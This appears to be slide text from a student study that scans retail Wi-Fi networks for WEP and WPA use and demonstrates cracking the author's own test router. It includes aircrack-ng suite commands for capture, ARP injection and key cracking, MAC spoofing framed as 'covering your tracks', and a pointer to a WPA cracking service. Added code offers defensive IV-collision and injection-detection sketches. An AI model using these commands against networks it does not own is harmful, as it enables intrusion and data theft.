An Empirical Study on Wireless Network Security for Retailers
Khai Tran

Introduction
Retail merchants have been incorporating wireless solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins.
- Apple – wireless handheld devices that provided credit authorization
- Starbucks – free Wi-Fi access for AT&T customers or those who wish to pay a fee of $3.99 for two hours
- Home Depot – wireless handheld devices are used throughout the store to perform inventory, price changes, and various other tasks
In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.

Lowe’s and TJX
Lowe’s - 2003
- Loosely protected wireless connection in Southfield, MI branch led to intrusion
- Trio of hackers (Brian Salcedo, Adam Botbyl, Paul Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states
TJX - 2005
- Two Miami-area Marshalls stores were compromised due to a breach in their unsecured wireless network
- Intruders had access to millions of credit card numbers due to weak data encryption

Purpose
Are Retailers Still Using WEP?
Goals:
- Scan wireless networks of retailers to determine whether the networks are secured and what type of security they use
- As a proof of concept, set up a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks

WEP (Wired Equivalent Privacy)
- Introduced in 1997 to secure 802.11 wireless networks
- Several weaknesses detected in 2001
  - Simple Initialization Vector (IV)
    - 24 bits
    - Repeats after about 5000 packets
  - Single shared key
  - Susceptible to eavesdropping
- Declared by IEEE in 2004 as failing to meet security requirements

WPA/WPA2 (Wi-Fi Protected Access)
- Introduced in 2003 to replace WEP
- IV is increased from 24 to 48 bits
  - Re-use of keys is unlikely
- 256 bit keys as opposed to 128
  - 2^128
- Implements TKIP (Temporal Key Integrity Protocol) to support pre-WPA
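
The "repeats after about 5000 packets" figure for WEP's 24-bit IV, and the reason a 48-bit IV makes re-use unlikely, both follow from the birthday bound. The sketch below is an added example, not part of the original slides; it assumes IVs are chosen uniformly at random, and all function names are hypothetical.

```python
import math
import random

def collision_probability(packets: int, iv_bits: int) -> float:
    """Chance that at least two of `packets` frames share an IV, assuming
    each IV is drawn uniformly at random (an assumption of this example)."""
    space = 2 ** iv_bits
    if packets > space:
        return 1.0
    # Birthday bound: 1 - exp(-n(n-1) / 2N). expm1 keeps tiny results accurate.
    return -math.expm1(-packets * (packets - 1) / (2 * space))

def packets_for_probability(target: float, iv_bits: int) -> int:
    """Smallest packet count whose collision probability reaches `target`."""
    k = -2 * (2 ** iv_bits) * math.log1p(-target)   # need n(n-1) >= k
    n = math.ceil((1 + math.sqrt(1 + 4 * k)) / 2)
    while n > 1 and (n - 1) * (n - 2) >= k:          # guard against rounding
        n -= 1
    while n * (n - 1) < k:
        n += 1
    return n

def mean_packets_to_first_repeat(iv_bits: int, trials: int, seed: int = 1) -> float:
    """Monte Carlo check: average frames sent until an IV is seen twice."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        seen = set()
        while True:
            iv = rng.getrandbits(iv_bits)
            if iv in seen:
                break
            seen.add(iv)
        total += len(seen) + 1       # the repeating frame counts too
    return total / trials

if __name__ == "__main__":
    for bits in (24, 48):            # WEP IV size vs. WPA IV size from the slides
        print(bits, "bit IV: 50% repeat chance after",
              packets_for_probability(0.5, bits), "packets;",
              "P(repeat in 5000 packets) =", collision_probability(5000, bits))
    print("simulated mean, 24-bit:", mean_packets_to_first_repeat(24, 300))
```

With a 24-bit IV a repeat becomes more likely than not a little under 5000 packets, while the same 5000 packets under a 48-bit IV give a repeat chance of a few parts in a hundred million.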

Tools Used for Passive Scans
- OCZ Neutrino netbook
  - Windows XP SP3
  - Intel Atom (N270) 1.60 GHz, 2.0 GB RAM
  - RealTek RTL8187SE Wireless LAN PCIE
- WirelessNetView software
  - Created by Nir Sofer
  - Version 1.26
  - www.nirsoft.net
- Why was WirelessNetView chosen for passive scans?

Cities scanned
- Sacramento
- Citrus Heights
- Roseville
- Oroville
- Chico

Sample Scan with WirelessNetView

Scan Results
65 retail networks were scanned over a period of two weeks
Security
- Less than 17% (11) were still using WEP to secure their network
- Of the 17%, only three (0.5%) were Big Box retailers while all the others were small local retail shops
- Most retailers have adopted WPA
No Security
- Just over 26% (17) had no security on their network
- 13 of these 17 were Big Box retailers

What is BackTrack?
- Created by Mati Aharoni and Max Moser
- Supported by Linux community
- www.remote-exploit.org
- Live Linux distro based on Slackware and available as a Live CD or on USB boot
- Includes tools such as kismet, metasploit, wireshark
- Used for pen testing, network security and analysis

Tools Used For Cracking
- Dell Latitude D820
  - Windows XP SP2
  - Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM
  - Intel PRO/Wireless 3945ABG
- 2Wire 3800HGV-B Uverse Router
  - WEP, WPA, WPA2
- BackTrack version 3
  - airmon-ng
  - airodump-ng
  - aireplay-ng
  - aircrack-ng
  - macchanger

Steps to Cracking WEP
- Spoof MAC address
- Turn wireless card into monitoring mode
- Scan available networks and capture packets
- Inject ARP-request packets into network to generate traffic
- Feed data to aircrack-ng for password cracking
Check Wireless Driver
Spoof MAC
Covering your tracks…

Search Available Networks
    airodump-ng wifi0

Capture Packets On Target Network
    airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0

Inject Packets & Attempt to Crack
    aireplay-ng -3 -b 00:21:7C:4E:89:51 -h 00:11:22:33:44:55 wifi0
    aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap

WEP Cracking Demonstration
- Linksys Wireless-G Router (WRT54G)
- SSID - 693TEST
- MAC – 00:1D:7E:35:AA:6D

Cracking WPA
- Requires deauthentication from AP and re-authentication

WPA-PSK Cracking Service
- www.wpacracker.com
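
Both the ARP-request injection step in the WEP procedure and the deauthentication step in the WPA procedure leave traces a wireless monitor can pick up: WEP has no replay protection, so a re-injected frame carries the IV it was captured with, and forced re-authentication shows up as a burst of deauthentication frames. The detector below is an added example, not part of the original slides; the frame records are constructed, and the record layout, thresholds and function names are assumptions.

```python
from collections import defaultdict, deque

AP = "00:21:7C:4E:89:51"        # BSSID used in the slides' commands
SPOOFED = "00:11:22:33:44:55"   # source MAC used in the slides' aireplay-ng line
CLIENT = "AA:BB:CC:00:00:01"    # constructed legitimate client

def sample_frames():
    """Constructed capture summary: (time_s, kind, src, bssid, wep_iv)."""
    frames = [(i * 0.1, "data", CLIENT, AP, f"{i:06x}") for i in range(200)]
    # One captured frame re-injected 400 times in 2 s: same IV every time.
    frames += [(5 + i * 0.005, "data", SPOOFED, AP, "0a1b2c") for i in range(400)]
    # 64 deauthentication frames in about a second, then one ordinary one.
    frames += [(30 + i * 0.015, "deauth", AP, AP, None) for i in range(64)]
    frames.append((60.0, "deauth", AP, AP, None))
    return frames

def bursts(events, window_s, threshold):
    """events: (time_s, key) pairs in time order. Returns {key: peak count}
    for every key seen at least `threshold` times inside one window."""
    recent, peaks = defaultdict(deque), {}
    for ts, key in events:
        q = recent[key]
        q.append(ts)
        while q[0] < ts - window_s:      # drop sightings older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def detect(frames, window_s=10.0, replay_threshold=50, deauth_threshold=20):
    """Thresholds are illustrative assumptions; tune them per site."""
    frames = sorted(frames, key=lambda f: f[0])
    replay = bursts(((t, (src, bssid, iv)) for t, kind, src, bssid, iv in frames
                     if kind == "data" and iv is not None),
                    window_s, replay_threshold)
    deauth = bursts(((t, bssid) for t, kind, _src, bssid, _iv in frames
                     if kind == "deauth"), window_s, deauth_threshold)
    return {"iv_replay": replay, "deauth_burst": deauth}

if __name__ == "__main__":
    for name, hits in detect(sample_frames()).items():
        for key, count in hits.items():
            print(f"{name}: {key} seen {count} times in one window")
```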

Conclusion
Big Box Retailers
- Most have either adopted WPA to secure their network or provided public portals for user authentication
Small & Local Retail Shops
- A small number are still using WEP or no security at all

Afterthoughts
Residential Wireless Networks
- A lot of networks are still using WEP
- Scan of Nord Ave
  - 182 networks detected
  - 36% (65) are using WEP
  - Out of the 182 networks, 29 are obvious 2WIRE### routers
  - 27 of these are using WEP
2006 survey by A. Bittau, M. Handley, and J. Lackey
- 400 networks scanned in London
  - 76% WEP, 20% WPA, 4% 802.11i
- 2,539 networks scanned in Seattle
  - 85% WEP, 14% WPA, 1% 802.11i

2WIRE WEP Networks

Questions?

References
- Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP's Coffin," sp, pp.386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006.
- Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp
- Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241
- Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," ares, pp.1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006
- Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot-Tackles-Network-Challenge/
- Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438
- Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/
- Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/
- Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," services, pp.368-374, 2007 IEEE Congress on Services (Services 2007), 2007
- www.nirsoft.net/about_nirsoft_freeware.html
- http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-Service
- www.aircrack-ng.org